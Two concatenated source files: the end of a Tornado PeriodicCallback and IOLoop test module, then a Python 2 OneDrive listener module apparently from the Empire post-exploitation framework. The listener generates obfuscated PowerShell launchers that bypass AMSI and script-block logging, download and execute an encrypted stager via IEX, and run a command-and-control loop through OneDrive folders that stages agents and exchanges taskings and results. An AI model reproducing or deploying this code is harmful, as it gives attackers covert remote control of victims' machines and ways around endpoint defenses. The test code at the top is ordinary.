# time.time() and time.monotonic() are different, time.time()
# is getting adjusted by NTP and is therefore more accurate)
self.assertEqual(
self.simulate_calls(pc, [-2, -1, -3, -2, 0]), [1010, 1020, 1030, 1040, 1050]
)
# For big jumps, we should perhaps alter the schedule, but we
# don't currently. This trace shows that we run callbacks
# every 10s of time.time(), but the first and second calls are
# 110s of real time apart because the backwards jump is
# ignored.
self.assertEqual(self.simulate_calls(pc, [-100, 0, 0]), [1010, 1020, 1030])
def test_jitter(self):
random_times = [0.5, 1, 0, 0.75]
expected = [1010, 1022.5, 1030, 1041.25]
call_durations = [0] * len(random_times)
pc = PeriodicCallback(self.dummy, 10000, jitter=0.5)
def mock_random():
return random_times.pop(0)
with mock.patch("random.random", mock_random):
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_timedelta(self):
pc = PeriodicCallback(lambda: None, datetime.timedelta(minutes=1, seconds=23))
expected_callback_time = 83000
self.assertEqual(pc.callback_time, expected_callback_time)
class TestPeriodicCallbackAsync(AsyncTestCase):
    """Runs PeriodicCallback against a live IOLoop with plain, decorated,
    and native-coroutine callbacks."""

    def test_periodic_plain(self):
        count = 0

        def callback() -> None:
            nonlocal count
            count += 1
            if count == 3:
                self.stop()

        pc = PeriodicCallback(callback, 10)
        pc.start()
        self.wait()
        pc.stop()
        self.assertEqual(count, 3)

    def test_periodic_coro(self) -> None:
        # counts[0]/counts[1] track entries/exits of the coroutine so we can
        # verify the callbacks do not overlap while one is sleeping.
        counts = [0, 0]

        @gen.coroutine
        def callback() -> "Generator[Future[None], object, None]":
            counts[0] += 1
            yield gen.sleep(0.025)
            counts[1] += 1
            if counts[1] == 3:
                pc.stop()
                self.io_loop.add_callback(self.stop)

        pc = PeriodicCallback(callback, 10)
        pc.start()
        self.wait()
        self.assertEqual(counts[0], 3)
        self.assertEqual(counts[1], 3)

    def test_periodic_async(self) -> None:
        # Same as test_periodic_coro, but with a native coroutine callback.
        counts = [0, 0]

        async def callback() -> None:
            counts[0] += 1
            await gen.sleep(0.025)
            counts[1] += 1
            if counts[1] == 3:
                pc.stop()
                self.io_loop.add_callback(self.stop)

        pc = PeriodicCallback(callback, 10)
        pc.start()
        self.wait()
        self.assertEqual(counts[0], 3)
        self.assertEqual(counts[1], 3)
class TestIOLoopConfiguration(unittest.TestCase):
    """Spawns fresh interpreter subprocesses to verify which IOLoop
    implementation is selected under various configurations."""

    def run_python(self, *statements):
        # Build a one-line script: a fixed preamble plus the caller's
        # statements, joined with semicolons, and run it in a subprocess.
        preamble = [
            "from tornado.ioloop import IOLoop",
            "classname = lambda x: x.__class__.__name__",
        ]
        script = "; ".join(preamble + list(statements))
        output = subprocess.check_output([sys.executable, "-c", script])
        return native_str(output).strip()

    def test_default(self):
        # When asyncio is available, it is used by default.
        cls = self.run_python("print(classname(IOLoop.current()))")
        self.assertEqual(cls, "AsyncIOMainLoop")
        cls = self.run_python("print(classname(IOLoop()))")
        self.assertEqual(cls, "AsyncIOLoop")

    def test_asyncio(self):
        cls = self.run_python(
            'IOLoop.configure("tornado.platform.asyncio.AsyncIOLoop")',
            "print(classname(IOLoop.current()))",
        )
        self.assertEqual(cls, "AsyncIOMainLoop")

    def test_asyncio_main(self):
        cls = self.run_python(
            "from tornado.platform.asyncio import AsyncIOMainLoop",
            "AsyncIOMainLoop().install()",
            "print(classname(IOLoop.current()))",
        )
        self.assertEqual(cls, "AsyncIOMainLoop")
if __name__ == "__main__":
    # Allow running this test module directly: python ioloop_test.py
    unittest.main()
|
onedrive.py | import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
#Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener:
    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default for `params`; it is unused in this
        # body, but `params=None` would be safer — confirm against callers.

        # Metadata shown by Empire's `info` command for this listener module.
        self.info = {
            'Name': 'Onedrive',
            'Author': ['@mr64bit'],
            'Description': ('Starts a Onedrive listener. Setup instructions here:        gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
            'Category': ('third_party'),
            'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
        }

        # Configurable options; every entry has the shape
        # {'Description': str, 'Required': bool, 'Value': ...}.
        self.options = {
            'Name': {
                'Description': 'Name for the listener.',
                'Required': True,
                'Value': 'onedrive'
            },
            'ClientID': {
                'Description': 'Application ID of the OAuth App.',
                'Required': True,
                'Value': ''
            },
            'ClientSecret': {
                'Description': 'Client secret of the OAuth App.',
                'Required': True,
                'Value': ''
            },
            'AuthCode': {
                'Description': 'Auth code given after authenticating OAuth App.',
                'Required': True,
                'Value': ''
            },
            'BaseFolder': {
                'Description': 'The base Onedrive folder to use for comms.',
                'Required': True,
                'Value': 'empire'
            },
            'StagingFolder': {
                'Description': 'The nested Onedrive staging folder.',
                'Required': True,
                'Value': 'staging'
            },
            'TaskingsFolder': {
                'Description': 'The nested Onedrive taskings folder.',
                'Required': True,
                'Value': 'taskings'
            },
            'ResultsFolder': {
                'Description': 'The nested Onedrive results folder.',
                'Required': True,
                'Value': 'results'
            },
            'Launcher': {
                'Description': 'Launcher string.',
                'Required': True,
                'Value': 'powershell -noP -sta -w 1 -enc '
            },
            'StagingKey': {
                'Description': 'Staging key for intial agent negotiation.',
                'Required': True,
                'Value': 'asdf'
            },
            'PollInterval': {
                'Description': 'Polling interval (in seconds) to communicate with Onedrive.',
                'Required': True,
                'Value': '5'
            },
            'DefaultDelay': {
                'Description': 'Agent delay/reach back interval (in seconds).',
                'Required': True,
                'Value': 60
            },
            'DefaultJitter': {
                'Description': 'Jitter in agent reachback interval (0.0-1.0).',
                'Required': True,
                'Value': 0.0
            },
            'DefaultLostLimit': {
                'Description': 'Number of missed checkins before exiting',
                'Required': True,
                'Value': 10
            },
            'DefaultProfile': {
                'Description': 'Default communication profile for the agent.',
                'Required': True,
                'Value': "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
            },
            'KillDate': {
                'Description': 'Date for the listener to exit (MM/dd/yyyy).',
                'Required': False,
                'Value': ''
            },
            'WorkingHours': {
                'Description': 'Hours for the agent to operate (09:00-17:00).',
                'Required': False,
                'Value': ''
            },
            'RefreshToken': {
                'Description': 'Refresh token used to refresh the auth token',
                'Required': False,
                'Value': ''
            },
            'RedirectURI': {
                'Description': 'Redirect URI of the registered application',
                'Required': True,
                'Value': "https://login.live.com/oauth20_desktop.srf"
            },
            'SlackToken': {
                'Description': 'Your SlackBot API token to communicate with your Slack instance.',
                'Required': False,
                'Value': ''
            },
            'SlackChannel': {
                'Description': 'The Slack channel or DM that notifications will be sent to.',
                'Required': False,
                'Value': '#general'
            }
        }

        self.mainMenu = mainMenu
        # One worker thread per started listener instance, keyed by name.
        self.threads = {}

        # Pull the global staging key out of the Empire config database.
        self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
    def validate_options(self):
        # Validate the configured options; returns True when the listener
        # can be started, False otherwise (after printing the reason).

        # URIs come from the first pipe-separated field of DefaultProfile.
        self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]

        #If we don't have an OAuth code yet, give the user a URL to get it
        if (str(self.options['RefreshToken']['Value']).strip() == '') and (str(self.options['AuthCode']['Value']).strip() == ''):
            if (str(self.options['ClientID']['Value']).strip() == ''):
                print helpers.color("[!] ClientID needed to generate AuthCode URL!")
                return False
            params = {'client_id': str(self.options['ClientID']['Value']).strip(),
                      'response_type': 'code',
                      'redirect_uri': self.options['RedirectURI']['Value'],
                      'scope': 'files.readwrite offline_access'}
            # Build (but don't send) the authorize request just to render
            # the fully-encoded URL for the operator.
            req = Request('GET', 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params=params)
            prep = req.prepare()
            print helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url)
            return False

        # All Required options must have a non-empty value.
        for key in self.options:
            if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
                print helpers.color("[!] Option \"%s\" is required." % (key))
                return False

        return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print helpers.color("[!] listeners/onedrive generate_launcher(): No language specified")
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" #Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher, obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet")
return "python not implimented yet"
else:
print helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print helpers.color("[!] listeners/onedrive generate_stager(): no language specified")
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+staging_key, randomized_stager)
else:
return randomized_stager
else:
print helpers.color("[!] Python agent not available for Onedrive")
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language=None):
    """
    Build the PowerShell communication routines ($GetWebClient, $SendMessage,
    $GetTask) the agent uses to talk to OneDrive through the Microsoft Graph
    API.  The OAuth client credentials and tokens are interpolated directly
    into the generated script.

    Returns the combined script text, or None (implicitly) when no language
    is given or the language is not PowerShell.
    """
    staging_key = listener_options['StagingKey']['Value']
    base_folder = listener_options['BaseFolder']['Value']
    taskings_folder = listener_options['TaskingsFolder']['Value']
    results_folder = listener_options['ResultsFolder']['Value']
    if not language:
        print helpers.color("[!] listeners/onedrive generate_comms(): No language specified")
        return
    if language.lower() == "powershell":
        # $GetWebClient: factory for a WebClient with proxy settings and the
        # required headers; transparently refreshes the OAuth access token
        # via the refresh_token grant when it is about to expire.
        token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
        # $SendMessage: encrypt outgoing packets, append any data already in
        # the agent's results file, and PUT the result back to OneDrive.
        post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
$script:missedChecking = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
        # $GetTask: download this session's tasking file (checking in first
        # if we have been quiet too long), delete it server-side, and restage
        # if the server replied with the literal "RESTAGE".
        get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
        return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language=None):
"""
Generate the agent code
"""
if not language:
print helpers.color("[!] listeners/onedrive generate_agent(): No language specified")
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64_default_response+'"')
if kill_date != "":
agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
    """
    Main loop for the OneDrive listener.

    Authenticates to the Microsoft Graph API, creates the OneDrive folder
    structure, uploads the stager and launcher, then polls OneDrive forever:
    handling agent staging handshakes, uploading taskings, and collecting
    results.  Runs inside a killable thread (see start()).
    """
    # Utility functions to handle auth tasks and initial setup.
    # NOTE: these closures read s, base_url, redirect_uri, listener_name and
    # the folder names, which are assigned later in this function body.
    def get_token(client_id, client_secret, code):
        # Exchange the one-time OAuth authorization code for tokens.
        params = {'client_id': client_id,
                  'client_secret': client_secret,
                  'grant_type': 'authorization_code',
                  'scope': 'files.readwrite offline_access',
                  'code': code,
                  'redirect_uri': redirect_uri}
        try:
            r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
            r_token = r.json()
            # Absolute expiry, 15s early so we refresh before the token dies.
            r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
            r_token['update'] = True  # flag: the refresh token must be persisted
            return r_token
        except KeyError, e:
            # Missing 'expires_in' means the token endpoint returned an error body.
            print helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))
            raise

    def renew_token(client_id, client_secret, refresh_token):
        # Trade a refresh token for a fresh access token (same shape as get_token()).
        params = {'client_id': client_id,
                  'client_secret': client_secret,
                  'grant_type': 'refresh_token',
                  'scope': 'files.readwrite offline_access',
                  'refresh_token': refresh_token,
                  'redirect_uri': redirect_uri}
        try:
            r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
            r_token = r.json()
            r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
            r_token['update'] = True
            return r_token
        except KeyError, e:
            print helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))
            raise

    def test_token(token):
        # Probe the Graph /drive endpoint to confirm the access token works.
        headers = s.headers.copy()
        headers['Authorization'] = 'Bearer ' + token
        request = s.get("%s/drive" % base_url, headers=headers)
        return request.ok

    def setup_folders():
        # Create the base folder plus staging/taskings/results subfolders if missing.
        if not (test_token(token['access_token'])):
            raise ValueError("Could not set up folders, access token invalid")
        base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
        if not (base_object.status_code == 200):
            print helpers.color("[*] Creating %s folder" % base_folder)
            params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
            base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
        else:
            message = "[*] {} folder already exists".format(base_folder)
            signal = json.dumps({
                'print' : True,
                'message': message
            })
            dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
        for item in [staging_folder, taskings_folder, results_folder]:
            item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
            if not (item_object.status_code == 200):
                print helpers.color("[*] Creating %s/%s folder" % (base_folder, item))
                params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
                item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']), json=params)
            else:
                message = "[*] {}/{} already exists".format(base_folder, item)
                signal = json.dumps({
                    'print' : True,
                    'message': message
                })
                dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

    def upload_launcher():
        # Upload a plain-text PowerShell launcher and create an anonymous share link.
        ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False, userAgent='none', proxy='none', proxyCreds='none')
        r = s.put("%s/drive/root:/%s/%s/%s:/content" %(base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
                  data=ps_launcher, headers={"Content-Type": "text/plain"})
        if r.status_code == 201 or r.status_code == 200:
            item = r.json()
            r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
                       json={"scope": "anonymous", "type": "view"},
                       headers={"Content-Type": "application/json"})
            # NOTE(review): launcher_url is computed but never stored or returned.
            launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']

    def upload_stager():
        # Upload the stage-0 stager and store its anonymous share URL on the
        # active listener record so launchers can reference it.
        ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell', token=token['access_token'])
        r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
                  data=ps_stager, headers={"Content-Type": "application/octet-stream"})
        if r.status_code == 201 or r.status_code == 200:
            item = r.json()
            r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
                       json={"scope": "anonymous", "type": "view"},
                       headers={"Content-Type": "application/json"})
            stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
            #Different domain for some reason?
            self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
        else:
            print helpers.color("[!] Something went wrong uploading stager")
            message = r.content
            signal = json.dumps({
                'print' : True,
                'message': message
            })
            dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

    # Unpack listener options into locals (the closures above capture these).
    listener_options = copy.deepcopy(listenerOptions)
    listener_name = listener_options['Name']['Value']
    staging_key = listener_options['StagingKey']['Value']
    poll_interval = listener_options['PollInterval']['Value']
    client_id = listener_options['ClientID']['Value']
    client_secret = listener_options['ClientSecret']['Value']
    auth_code = listener_options['AuthCode']['Value']
    refresh_token = listener_options['RefreshToken']['Value']
    base_folder = listener_options['BaseFolder']['Value']
    staging_folder = listener_options['StagingFolder']['Value'].strip('/')
    taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
    results_folder = listener_options['ResultsFolder']['Value'].strip('/')
    redirect_uri = listener_options['RedirectURI']['Value']
    base_url = "https://graph.microsoft.com/v1.0"

    s = Session()
    # Prefer a saved refresh token; otherwise redeem the one-time auth code.
    if refresh_token:
        token = renew_token(client_id, client_secret, refresh_token)
        message = "[*] Refreshed auth token"
        signal = json.dumps({
            'print' : True,
            'message': message
        })
        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
    else:
        token = get_token(client_id, client_secret, auth_code)
        message = "[*] Got new auth token"
        signal = json.dumps({
            'print' : True,
            'message': message
        })
        dispatcher.send(signal, sender="listeners/onedrive")
    s.headers['Authorization'] = "Bearer " + token['access_token']

    setup_folders()

    while True:
        #Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
        try:
            if listener_name in self.mainMenu.listeners.activeListeners.keys():
                upload_stager()
                upload_launcher()
                break
            else:
                time.sleep(1)
        except AttributeError:
            # activeListeners may not exist yet during startup; retry.
            time.sleep(1)

    # Main polling loop: staging -> taskings -> results, every poll_interval.
    while True:
        time.sleep(int(poll_interval))
        try: #Wrap the whole loop in a try/catch so one error won't kill the listener
            if time.time() > token['expires_at']: #Get a new token if the current one has expired
                token = renew_token(client_id, client_secret, token['refresh_token'])
                s.headers['Authorization'] = "Bearer " + token['access_token']
                message = "[*] Refreshed auth token"
                signal = json.dumps({
                    'print' : True,
                    'message': message
                })
                dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                # Re-upload the stager so it carries the fresh access token.
                upload_stager()
            if token['update']:
                # Persist the latest refresh token in the listener options.
                self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken", token['refresh_token'])
                token['update'] = False

            # --- Agent staging: scan the staging folder for handshake files ---
            search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
            for item in search.json()['children']: #Iterate all items in the staging folder
                try:
                    # Staging files are named <AGENTNAME>_<stage>.txt
                    reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
                    if not reg:
                        continue
                    agent_name, stage = reg.groups()
                    if stage == '1': #Download stage 1, upload stage 2
                        message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'], item['size'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        content = s.get(item['@microsoft.graph.downloadUrl']).content
                        lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
                        message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(return_val)))
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=return_val)
                        message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                    if stage == '3': #Download stage 3, upload stage 4 (full agent code)
                        message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder, item['name'], item['size'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        content = s.get(item['@microsoft.graph.downloadUrl']).content
                        lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
                        session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
                        agent_token = renew_token(client_id, client_secret, token['refresh_token']) #Get auth and refresh tokens for the agent to use
                        agent_code = str(self.generate_agent(listener_options, client_id, client_secret, agent_token['access_token'],
                                         agent_token['refresh_token'], redirect_uri, lang))
                        # Full agent is encrypted with the negotiated session key.
                        enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
                        message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(enc_code)))
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=enc_code)
                        message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                except Exception, e:
                    # One bad staging file must not stop the rest of the scan.
                    print helpers.color("[!] Could not handle agent staging for listener %s, continuing" % listener_name)
                    message = traceback.format_exc()
                    signal = json.dumps({
                        'print': False,
                        'message': message
                    })
